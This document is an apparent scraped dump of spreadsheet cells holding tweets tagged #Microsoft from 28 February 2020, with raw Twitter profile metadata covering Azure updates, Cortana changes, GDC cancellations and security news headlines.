    <t>{'id': 2954806170, 'id_str': '2954806170', 'name': 'Faisal Pathan', 'screen_name': 'faisalmpathan', 'location': 'GUJARAT, INDIA', 'description': '.NET Project Manager | C# Corner MVP | Founder #TheCodeHubs', 'url': 'https://t.co/NE3Q67b0sw', 'entities': {'url': {'urls': [{'url': 'https://t.co/NE3Q67b0sw', 'expanded_url': 'https://thecodehubs.com/', 'display_url': 'thecodehubs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 160, 'listed_count': 1, 'created_at': 'Thu Jan 01 13:14:01 +0000 2015', 'favourites_count': 412, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 154,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'http://pbs.twimg.com/profile_images/1120301720469327872/MtpvWP63_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120301720469327872/MtpvWP63_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2954806170/1555935705',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</si>
  <si>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19:16:12 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Critical Bugs in WordPress Plugins Let Hackers Take Over Sites:" https://t.co/F2tKKv7z4n
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 19:13:47 +0000 2020</t>
  </si>
  <si>
    <t>How a spreadsheet error can cost you not only millions but also your company!
https://t.co/pLytVF8GJN
Testing your calculations would have prevented that!
#horror #development #software #business #BusinessPerformance #webdevelopment #webdev #excel #Microsoft #php #javascript</t>
  </si>
  <si>
    <t>{'id': 1052858377544421378, 'id_str': '1052858377544421378', 'name': 'Michael "lampe" Lazarski', 'screen_name': 'lampewebdev', 'location': 'Vilnius, Lithuania', 'description': 'ðŸ”¥ Experienced Senior Full-Stack ðŸ•¸ï¸Web Developer\nðŸ’¬ DM for collaborations and projects!\nðŸ‘‡ðŸ» For Amazing Links! ðŸ‘‡ðŸ»\nhttps://t.co/FsaYZNglnJ', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/FsaYZNglnJ', 'expanded_url': 'http://linktr.ee/lampewebdev', 'display_url': 'linktr.ee/lampewebdev', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 366, 'friends_count': 130, 'listed_count': 4, 'created_at': 'Thu Oct 18 09:46:13 +0000 2018', 'favourites_count': 481, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1155934773354930176/i3OCsoaw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155934773354930176/i3OCsoaw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1052858377544421378/1543742274', 'profile_link_color': '40A798',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</si>
  <si>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19:10:09 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft drops Cortana consumer skills in new Windows 10 update https://t.co/mMWi5lBBLg https://t.co/PiFoKttPDF</t>
  </si>
  <si>
    <t>Fri Feb 28 19:09:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Sony, EA and others drop out of GDC over coronavirus concerns
https://t.co/Eo1cnjDBb3
#CoronaVirus #Corona #Gaming #Microsoft #EA https://t.co/LrjeNIG2lI</t>
  </si>
  <si>
    <t>{'id': 1073910382492860421, 'id_str': '1073910382492860421', 'name': 'Daavs Gaming News', 'screen_name': 'DaavsNews', 'location': 'Daavs Headquarters', 'description': 'âœ‰ï¸ Fortnite News and More. \nðŸ—’ https://t.co/rGOXvvDPsu\nNot affiliated with @EpicGames or @FortniteGame.', 'url': 'https://t.co/SzKxAyokjt', 'entities': {'url': {'urls': [{'url': 'https://t.co/SzKxAyokjt', 'expanded_url': 'https://www.daavs.org/', 'display_url': 'daavs.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/rGOXvvDPsu', 'expanded_url': 'http://www.daavs.org', 'display_url': 'daavs.org', 'indices': [30, 53]}]}}, 'protected': False, 'followers_count': 19, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Sat Dec 15 11:59:22 +0000 2018', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 174,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'http://pbs.twimg.com/profile_images/1231543284624957440/KPUJTfzM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231543284624957440/KPUJTfzM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1073910382492860421/1582457776', 'profile_link_color': '0000CC',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</si>
  <si>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19:08:46 +0000 2020</t>
  </si>
  <si>
    <t>Free secret surfing video game in your browser. Click here to play https://t.co/RKBBb2Xuwk
Better than the one #Microsoft made for  the #edge browser.  It's a mini game from Search For Surf which is on Steam games website here https://t.co/fEDD87Poqd
Open world surfing video game https://t.co/X4Ij5ba2I7</t>
  </si>
  <si>
    <t>{'id': 998026754269659136, 'id_str': '998026754269659136', 'name': 'cuttinged', 'screen_name': 'searchforsurf', 'location': 'Oxnard, CA', 'description': 'surfing video game developer', 'url': 'https://t.co/iyuSa6DWSh', 'entities': {'url': {'urls': [{'url': 'https://t.co/iyuSa6DWSh', 'expanded_url': 'http://searchforsurf.com', 'display_url': 'searchforsurf.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sun May 20 02:24:55 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1169817926951563264/QJihi4BC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169817926951563264/QJihi4BC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/998026754269659136/1567741303',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</si>
  <si>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19:07:02 +0000 2020</t>
  </si>
  <si>
    <t>To celebrate #BlackHistoryMonth #Microsoft execs, leaders, award winners, and chapter members from the Blacks at Microsoft (BAM) employee resource group got to ring the @Nasdaq closing bell. 
Learn about what it means to be part of BAM: https://t.co/RfNmWfmJOK 
#IAMCP #MSPartner https://t.co/j67jEfS1bm</t>
  </si>
  <si>
    <t>Fri Feb 28 19:06:57 +0000 2020</t>
  </si>
  <si>
    <t>"Rather than push solutions that arent the right fit for the client, KiZAN has invested the time and resources to work across silos in order to achieve a holistic vision of LG&amp;amp;Es business needs..."
Read More: https://t.co/E28nxL3PAs
#microsoft https://t.co/gjOqXkF9Yu</t>
  </si>
  <si>
    <t>Fri Feb 28 19:05:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft adds productivity features to Cortana, drops consumer skills including music, connected home, and third-party skills in the upcoming Windows 10 update (Sean Endicott/Windows Central) now trending on Monkey Viral - https://t.co/RuFq1XtSqI</t>
  </si>
  <si>
    <t>Fri Feb 28 19:05:19 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X can resume games after reboot, audio ray-tracing also teased
Read more: https://t.co/5vvNYngHpS #XboxSeriesX #Microsoft #gamingnews</t>
  </si>
  <si>
    <t>{'id': 30717381, 'id_str': '30717381', 'name': 'Daz M', 'screen_name': 'Dazman77', 'location': 'Blackpool, England', 'description': 'Gamer/Geek. Rocker/Raver. Football/Wrestling fan. Hard Worker/Volunteer. Centrist. XBL: FuzzyAcrobat777. PSN: DazmanV2.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 301, 'friends_count': 304, 'listed_count': 20, 'created_at': 'Sun Apr 12 20:42:37 +0000 2009', 'favourites_count': 3272, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6167,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'http://pbs.twimg.com/profile_images/1195776339309146112/TiYOFEUF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195776339309146112/TiYOFEUF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30717381/1556816652', 'profile_link_color': 'FF0000',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</si>
  <si>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Fri Feb 28 19:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting #Windows 10 Always On #VPN IKEv2 policy mismatch errors. #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/UkaKWlZxr0</t>
  </si>
  <si>
    <t>Fri Feb 28 19:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021 https://t.co/EfSK0x9VCP #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 19:05:12 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023 https://t.co/jfpTfk1yUL #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 19:05:05 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign Vatican pledge for ethical #AI - https://t.co/1oRv6H2e1E https://t.co/98UZZVIesm</t>
  </si>
  <si>
    <t>{'id': 20179712, 'id_str': '20179712', 'name': 'Maurice Becan', 'screen_name': 'MauriceBecan', 'location': 'New York, NY', 'description': 'Innovation Advocate, Technology Evangelist, Enterprise Architect. Enterprise Innovation Strategist for Microsoft. All tweets are my own sentiments.', 'url': 'http://t.co/hISqZPhgQE', 'entities': {'url': {'urls': [{'url': 'http://t.co/hISqZPhgQE', 'expanded_url': 'http://about.me/maurice.becan', 'display_url': 'about.me/maurice.becan', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 924, 'friends_count': 1171, 'listed_count': 186, 'created_at': 'Thu Feb 05 19:49:06 +0000 2009', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2516,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'http://pbs.twimg.com/profile_images/2300568403/u3j4opd13bbr9haweha4_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2300568403/u3j4opd13bbr9haweha4_normal.jpeg',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</si>
  <si>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Feb 28 19:05:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft launches Xbox bug bounty program with rewards of up to $20,000 https://t.co/qgf2yfosrQ  #Microsoft #bugbounty https://t.co/SSLQc5QVsT</t>
  </si>
  <si>
    <t>{'id': 859471969447690240, 'id_str': '859471969447690240', 'name': 'CyberSecurityAwards', 'screen_name': 'InfoSec_Awards', 'location': 'Los Angeles, CA', 'description': 'Recognizing the Best Companies, Products &amp; People in #CyberSecurity; including #CloudSecurity, #VulnerabilityManagement, #FraudPrevention, #APTProtection &amp; more', 'url': 'https://t.co/rpUADc81QX', 'entities': {'url': {'urls': [{'url': 'https://t.co/rpUADc81QX', 'expanded_url': 'http://www.CyberSecurityBreakthrough.com', 'display_url': 'CyberSecurityBreakthrough.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1888, 'friends_count': 2650, 'listed_count': 12, 'created_at': 'Tue May 02 18:17:40 +0000 2017', 'favourites_count': 667, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1746, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/859475380566151169/X4OI0QOv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859475380566151169/X4OI0QOv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/859471969447690240/1493749929',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</si>
  <si>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19:05:00 +0000 2020</t>
  </si>
  <si>
    <t>This recent post explains how to process an emailed file into a Power BI report using #Microsoft #Flow. Note: this assumes prior knowledge of #Power #BI #Desktop and describes just the steps needed to incorporate the file into the Power BI #Query #Editor. https://t.co/6WEh80aNJp https://t.co/D9agPKLiGW</t>
  </si>
  <si>
    <t>Fri Feb 28 19:04:16 +0000 2020</t>
  </si>
  <si>
    <t>RDP Security Tips: Stop Hackers, BlueKeep, and Exploits
 #Hackers #RDP #RemoteAccess #Azure #Microsoft #MicrosoftAzure
https://t.co/CsVrVxm0Pi</t>
  </si>
  <si>
    <t>Fri Feb 28 19:02:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is killing off the MCSA, MCSD, &amp;amp; MCSE certifications!!!  What does this mean for you?  
https://t.co/ppVRQ6sNGE
#microsoft #certpocalypse #itcareers #itcareerquestions #mcsa #mcse #mcsd #certifications https://t.co/4VM4VcwSep</t>
  </si>
  <si>
    <t>{'id': 2828065462, 'id_str': '2828065462', 'name': 'I.T Career Questions', 'screen_name': 'ITCareerHelp', 'location': 'Illinois, USA', 'description': 'YouTube Creator - \n\nHelping the World Discover I.T. Career Possibilities One Video at a Time.', 'url': 'https://t.co/MWrn7EoeoH', 'entities': {'url': {'urls': [{'url': 'https://t.co/MWrn7EoeoH', 'expanded_url': 'https://youtube.com/ITCareerQuestions', 'display_url': 'youtube.com/ITCareerQuestiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1679, 'friends_count': 458, 'listed_count': 63, 'created_at': 'Mon Oct 13 18:50:55 +0000 2014', 'favourites_count': 623, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3345,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'http://pbs.twimg.com/profile_images/985995931345670149/m0yDq-AB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/985995931345670149/m0yDq-AB_normal.jpg',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</si>
  <si>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19:01:55 +0000 2020</t>
  </si>
  <si>
    <t>Build a data analytics solution with #Microsoft #PowerPlatform today and create the foundation for tomorrow's end-to-end data analytics. Subscribe now to see how. https://t.co/lPuH3MRAsl</t>
  </si>
  <si>
    <t>Fri Feb 28 19:00:56 +0000 2020</t>
  </si>
  <si>
    <t>Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/4gIz71aCtR</t>
  </si>
  <si>
    <t>Fri Feb 28 18:58:37 +0000 2020</t>
  </si>
  <si>
    <t>Join us in DCI's high tech labs throughout Connecticut! Work on cool projects and earn credentials that employers want! #coding #careergoals #Technology #Cybersecurity #Programming #CompTIA #Cisco #Microsoft #jobs... https://t.co/zp7i7g8eR7</t>
  </si>
  <si>
    <t>Fri Feb 28 18:58:34 +0000 2020</t>
  </si>
  <si>
    <t>@aisteam bought a really good book I made by Kevin Hennessy and Chandermani Arora looking to know if they were looking to revise the book perhaps . Unable to contact them #angular #webdeveloper #Microsoft #CloudComputing</t>
  </si>
  <si>
    <t>{'id': 214686577, 'id_str': '214686577', 'name': 'Chris Samuel', 'screen_name': 'chrisksamuel', 'location': '', 'description': '"Even after graduating from  school, I never quite feel that I learned enough. While this is somewhat uncomfortable it is very comforting at the same time"', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 405, 'listed_count': 1, 'created_at': 'Fri Nov 12 00:21:03 +0000 2010', 'favourites_count': 718, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1599,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'http://pbs.twimg.com/profile_images/1230220652797464576/QmFvvth1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230220652797464576/QmFvvth1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/214686577/1582142436',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</si>
  <si>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18:56:34 +0000 2020</t>
  </si>
  <si>
    <t>for all windows users: i remember that i've used classic windows operating systems like windows 98 when i was kid.
#windows98 #windows #user #users #technology #classic #kid #ChildhoodMemories #childhood #kids #os #operatingsystem #operatingsystems #all #microsoft</t>
  </si>
  <si>
    <t>{'id': 1211048640598265856, 'id_str': '1211048640598265856', 'name': 'Ryan AndradeðŸ‡ºðŸ‡¸â¤ï¸', 'screen_name': 'RyanAnd67530498', 'location': 'Brazil (not really) or USA (?)', 'description': 'ðŸ• â™‚ï¸He/Him ðŸ‡ºðŸ‡¸ Ryan ðŸ‡ºðŸ‡¸ 20 ðŸ‡ºðŸ‡¸ autistic ðŸ‡ºðŸ‡¸ conservative ðŸ‡ºðŸ‡¸ random and all topics ðŸ‡ºðŸ‡¸ filmmaker/youtuber/streamer ðŸ•\n\nLanguages: ðŸ‡ºðŸ‡¸EN, ðŸ‡²ðŸ‡½ES, ðŸ‡§ðŸ‡·PT', 'url': 'https://t.co/g0gbd0N7UO', 'entities': {'url': {'urls': [{'url': 'https://t.co/g0gbd0N7UO', 'expanded_url': 'https://www.youtube.com/channel/UCGg8L08p5KrjxnkXnUmI9zw?view_as=subscriber', 'display_url': 'youtube.com/channel/UCGg8Lâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 91, 'listed_count': 0, 'created_at': 'Sat Dec 28 22:18:17 +0000 2019', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 449, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229411303669817344/_gaHvVyn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229411303669817344/_gaHvVyn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211048640598265856/1578611675',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</si>
  <si>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18:56:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft looks to give Yammer a new lease of life; can it?
@thematthewf @Computerworld 
https://t.co/Az6WLcjjBk</t>
  </si>
  <si>
    <t>Fri Feb 28 18:52:34 +0000 2020</t>
  </si>
  <si>
    <t>Six Strategies for Moving to the #Cloud | Link &amp;gt;&amp;gt; https://t.co/mX33vNHIEV . 
#cloudcomputing #cybersecurity #devops #security #Aws #Bigdata #Iot #Microsoft #Technology https://t.co/TI777aJeX1</t>
  </si>
  <si>
    <t>{'id': 3415215761, 'id_str': '3415215761', 'name': 'Tim Herglotz', 'screen_name': 'Tim_Herglotz', 'location': 'KÃ¶ln, Nordrhein-Westfalen', 'description': '#Dealmaker &amp; #DigitalStrategiest | Passionate about #MegaDeals and #DigitalTransformations | #Technology | #Innovation | #Father | Views are my own', 'url': 'https://t.co/TnVnEz3UkR', 'entities': {'url': {'urls': [{'url': 'https://t.co/TnVnEz3UkR', 'expanded_url': 'http://timherglotz.com', 'display_url': 'timherglotz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4690, 'friends_count': 2533, 'listed_count': 79, 'created_at': 'Tue Aug 11 13:10:52 +0000 2015', 'favourites_count': 15010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1987,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'http://pbs.twimg.com/profile_images/1233120858518020096/kxBy0W2l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233120858518020096/kxBy0W2l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3415215761/1583331602',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</si>
  <si>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18:51:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Surface #Dock for Pro #ForSale #Electronics - #Newark, NJ at #Geebo 
https://t.co/8R4ktBQ3gw https://t.co/LwTGIyHoEj</t>
  </si>
  <si>
    <t>{'id': 507888480, 'id_str': '507888480', 'name': 'Geebo', 'screen_name': 'GeeboAds', 'location': 'Washington, DC', 'description': '', 'url': 'https://t.co/vqsgHh8gTA', 'entities': {'url': {'urls': [{'url': 'https://t.co/vqsgHh8gTA', 'expanded_url': 'http://geebo.com', 'display_url': 'geebo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23047, 'friends_count': 1, 'listed_count': 237, 'created_at': 'Tue Feb 28 20:37:44 +0000 2012', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15883,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'http://pbs.twimg.com/profile_images/1095689241172967424/X7ow_Y5b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095689241172967424/X7ow_Y5b_normal.png',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</si>
  <si>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18:48:05 +0000 2020</t>
  </si>
  <si>
    <t>Is that some jealousy Im seeing @liltyrant? 
.
 @agonzaga46
.
#airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersofinstagram #evafoam #foamarmor #foamcosp... https://t.co/kVVTWVyjV2 https://t.co/a1GhPhNeBw</t>
  </si>
  <si>
    <t>Fri Feb 28 18:45:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Telefonica agreed to expand their global strategic collaboration. The US firm will open a Data Centre in Spain that will take advantage of Telefonicas infrastructure, which in turn will push the use of Microsofts cloud internally https://t.co/zSLItvISgg https://t.co/29Wd8T73pD</t>
  </si>
  <si>
    <t>Fri Feb 28 18:43:45 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023  https://t.co/sLubDNS6U1  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021  https://t.co/05allNqSlJ  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Fri Feb 28 18:43:34 +0000 2020</t>
  </si>
  <si>
    <t>The #NatureConservancy #Kenya experience #Microsoft #2020  https://t.co/2vGhohdMRu via @YouTube @Microsoft @Kenya @rrabg5 @WWF @NRDC @ASPCA @wildlife #savewildlife</t>
  </si>
  <si>
    <t>{'id': 246138191, 'id_str': '246138191', 'name': 'Ruben Rbg', 'screen_name': 'rrabg5', 'location': 'NYC New York', 'description': 'Technology Disrupting Business Biz Development TECH GURU F1 Photography Fitness Yoga Surfing Gamer Stocks Inv Life Enthusiast Keeping it Real Make it Happen!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 587, 'friends_count': 1279, 'listed_count': 168, 'created_at': 'Wed Feb 02 06:09:33 +0000 2011', 'favourites_count': 13083, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 101452,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'http://pbs.twimg.com/profile_images/477853889396346880/JBeVXMOe_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/477853889396346880/JBeVXMOe_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246138191/1359842497',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</si>
  <si>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18:42:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft drops Cortana consumer skills in new Windows 10 update https://t.co/NkIP465gSW #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:41:51 +0000 2020</t>
  </si>
  <si>
    <t>Migrate your IaaS resources to Azure Resource Manager by March 1, 2023  https://t.co/sLubDNS6U1   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Fri Feb 28 18:41:50 +0000 2020</t>
  </si>
  <si>
    <t>Service Management REST APIs and support will be retired on November 1, 2021  https://t.co/05allNqSlJ   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Fri Feb 28 18:41:47 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to #Microsoft #TransintheCity and #JLLBuildingPride we are sending 87 Sets of PopnOlly books to schools in Cheshire! (thats 348 books in total!) The set includes our transgender Cinderella story Jamie - check out all our books at https://t.co/i90HDgU9AK  https://t.co/nQM6fVk2vH</t>
  </si>
  <si>
    <t>{'id': 453283597, 'id_str': '453283597', 'name': "Pop'n'Olly", 'screen_name': 'PopnOlly', 'location': '', 'description': 'LGBT+ and Equality Education. Created by @OllyPike Youtube: https://t.co/hfeoz7LFTT Support us via: https://t.co/zw95HUW3O2', 'url': 'https://t.co/kIWnomxW1x', 'entities': {'url': {'urls': [{'url': 'https://t.co/kIWnomxW1x', 'expanded_url': 'http://www.popnolly.com', 'display_url': 'popnolly.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/hfeoz7LFTT', 'expanded_url': 'http://www.youtube.com/popnolly', 'display_url': 'youtube.com/popnolly', 'indices': [60, 83]}, {'url': 'https://t.co/zw95HUW3O2', 'expanded_url': 'http://popnolly.com/donate', 'display_url': 'popnolly.com/donate', 'indices': [100, 123]}]}}, 'protected': False, 'followers_count': 3040, 'friends_count': 1425, 'listed_count': 44, 'created_at': 'Mon Jan 02 19:27:43 +0000 2012', 'favourites_count': 4407, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4040, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '591470', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1152235659521908743/94QnaBvv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152235659521908743/94QnaBvv_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/453283597/1563554338', 'profile_link_color': '962DA8', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '01070A', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 18:41:02 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook, Microsoft, Epic Games cancel California conference plans over #coronavirus https://t.co/BEVxAFwvvb #Microsoft announced Thursday it was pulling out of next months Game Developers Conference in San Francisco. https://t.co/hlWs53QIxi</t>
  </si>
  <si>
    <t>Fri Feb 28 18:40:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft To Open Azure Cloud Data Center Region In Spain #spain #microsoft #digital  @crn https://t.co/x4Sb1VypUf</t>
  </si>
  <si>
    <t>{'id': 35203319, 'id_str': '35203319', 'name': 'Evan Kirstel', 'screen_name': 'evankirstel', 'location': 'Boston, MA', 'description': '#B2B #Analyst #Influencer helping #Enterprise #Tech clients w/ #SocialMedia #Marketing. See you at #EC20 #HIMSS20 #SXSW  #HPEdiscover! #Cloud #IoT #5G', 'url': 'https://t.co/qEToVUzSTc', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEToVUzSTc', 'expanded_url': 'http://linkedin.com/in/evankirstel', 'display_url': 'linkedin.com/in/evankirstel', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 281349, 'friends_count': 265511, 'listed_count': 13810, 'created_at': 'Sat Apr 25 12:45:16 +0000 2009', 'favourites_count': 564635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 901558,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'http://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35203319/1583164034',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</si>
  <si>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18:39:25 +0000 2020</t>
  </si>
  <si>
    <t>End-to-end IoT device security with Azure Sphere https://t.co/5sjtO8W6s3 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 18:35:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Migrate your IaaS resources to Azure Resource Manager by March 1, 2023 https://t.co/rHSFwovjBi</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Service Management REST APIs and support will be retired on November 1, 2021 https://t.co/LuHAOBly51</t>
  </si>
  <si>
    <t>Fri Feb 28 18:34:05 +0000 2020</t>
  </si>
  <si>
    <t>Looks like Apple is trying to differentiate iPad from #microsoft surface:  https://t.co/TFM3f36562</t>
  </si>
  <si>
    <t>{'id': 505692180, 'id_str': '505692180', 'name': 'Tomasz Onyszko', 'screen_name': 'tonyszko', 'location': 'Warsaw', 'description': 'CTO and partner @ Predica; identirati; futurist and sci-fi junkie; blogger; runner; father of two', 'url': 'http://t.co/MheKygVSgr', 'entities': {'url': {'urls': [{'url': 'http://t.co/MheKygVSgr', 'expanded_url': 'http://onyszko.com', 'display_url': 'onyszko.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1330, 'friends_count': 164, 'listed_count': 149, 'created_at': 'Mon Feb 27 09:33:01 +0000 2012', 'favourites_count': 5875, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15701,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'http://pbs.twimg.com/profile_images/924630175865860096/Wq53TKW__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/924630175865860096/Wq53TKW__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/505692180/1476696200',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</si>
  <si>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18:33:33 +0000 2020</t>
  </si>
  <si>
    <t>Powerful story told in the panel session with executive members of Texas Childrens Hospital in the #HPE - #Microsoft #Hybridcloud Summit session in Houston. A series of short videos let you share the insights. #USEnterpriseEast  #HPEMSFT #azurestackhci 
https://t.co/B9JAU92Sf1 https://t.co/XwX2NFtvur</t>
  </si>
  <si>
    <t>Fri Feb 28 18:32:30 +0000 2020</t>
  </si>
  <si>
    <t>Gates: Vaccine should be available to those in need
#gates #microsoft #coronavirus
https://t.co/L2nzIdx3CF</t>
  </si>
  <si>
